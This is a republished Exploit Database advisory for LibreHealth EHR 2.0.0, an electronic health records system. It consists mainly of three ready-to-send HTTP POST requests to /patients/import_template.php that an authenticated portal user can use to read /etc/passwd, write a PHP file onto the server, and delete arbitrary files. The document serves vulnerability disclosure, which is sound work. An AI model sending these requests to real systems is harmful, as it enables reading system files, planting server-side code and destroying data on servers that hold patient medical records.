LibreHealth 2.0.0 – (Authenticated) Arbitrary File Actions

• Exploit Database
• 128 阅读

• 作者： Carlos Avila
  日期： 2018-11-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45802/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70

  # Exploit Title: LibreHealth 2.0.0 - Arbitrary File Actions # Date: 2018-10-19 # Exploit Author: Carlos Avila # Vendor Homepage: https://librehealth.io/ # Software Link: https://github.com/LibreHealthIO/lh-ehr # Version: < 2.0.0 # Tested on: Debian LAMP, LibreHealth 2.0.0   # LibreHealth is the &apos;fork&apos; of the OpenEMR project. I have executed these PoCs # based on on Bug Reported by Joshua Fam [@Insecurity] # 1.Arbitrary File Read: # In LibreHealth a user that has access to the portal patient (authenticated) can send a # malicious POST request to read arbitrary files. POST /patients/import_template.php HTTP/1.1 Host: 192.168.6.200 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: LibreHealthEHR=jujkd0kvkpde70328l2v79kl90; PHPSESSID=gi8mp1e30csk5k7ji2hjo99lu4 Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 60 Content-Type: application/x-www-form-urlencoded   mode=get&docid=/etc/passwd # This attack represents a file inclusion attack (LFI) # 2.Arbitrary File Write: # In LibreHealth a user that has access to the portal patient (authenticated) can send # a malicious POST request to write arbitrary files.   POST /patients/import_template.php HTTP/1.1 Host: 192.168.6.200 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: LibreHealthEHR=jujkd0kvkpde70328l2v79kl90; PHPSESSID=gi8mp1e30csk5k7ji2hjo99lu4 Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 60 Content-Type: application/x-www-form-urlencoded   mode=save&docid=payload.php&content=<?php phpinfo();?>   # When you send the attack you can browse the website where the file was written and # the payload.php at http://192.168.6.200/patients/payload.php # 3. Arbitrary File Delete: # In LibreHealth a user that has access to the portal patient (authenticated) can send a # malicious POST request to delete a arbitrary file.   POST /patients/import_template.php HTTP/1.1 Host: 192.168.6.200 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: LibreHealthEHR=jujkd0kvkpde70328l2v79kl90; PHPSESSID=gi8mp1e30csk5k7ji2hjo99lu4 Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 60 Content-Type: application/x-www-form-urlencoded mode=delete&docid=payload.php   # When you make the attack you can navigate on the deleted page and you should receive 404 error (page not found)